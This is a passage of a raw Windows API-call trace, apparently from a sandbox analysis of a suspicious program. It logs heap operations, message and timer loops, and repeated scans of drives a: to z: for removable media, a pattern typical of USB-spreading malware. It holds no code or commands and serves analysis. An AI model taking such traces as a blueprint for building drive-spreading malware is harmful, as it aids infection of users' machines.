0x12ef810 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.645] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.645] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.645] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.646] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.646] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.646] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.646] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.646] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.647] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.647] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.647] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.647] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.647] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.648] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.649] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.649] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.649] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.649] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.649] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.650] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.650] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.650] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.650] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0216.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.650] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.651] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.651] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0216.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.651] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0216.651] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.652] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.652] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.652] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.652] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.652] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.652] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.653] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.653] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.653] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.653] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.653] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.654] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.654] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.654] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.654] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.654] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.654] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.655] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.655] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.655] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.655] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.655] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.656] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.657] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.657] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.657] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.657] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.657] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.658] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.658] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.658] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.658] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.658] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.659] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.659] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.659] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.659] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.659] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0216.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.659] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.659] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0216.660] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0216.660] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.660] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.660] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.660] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.660] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.660] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.661] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.661] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.661] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0216.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.662] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.662] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.667] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.667] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.667] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.667] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.667] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.667] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.668] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.668] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.668] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.668] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.669] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.670] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.670] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.670] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.670] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.670] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.671] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.671] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.671] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.671] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.672] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0216.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.673] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0216.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0216.673] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.674] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0216.674] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0216.674] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0216.674] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.674] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.674] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.674] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0216.674] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0216.674] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, 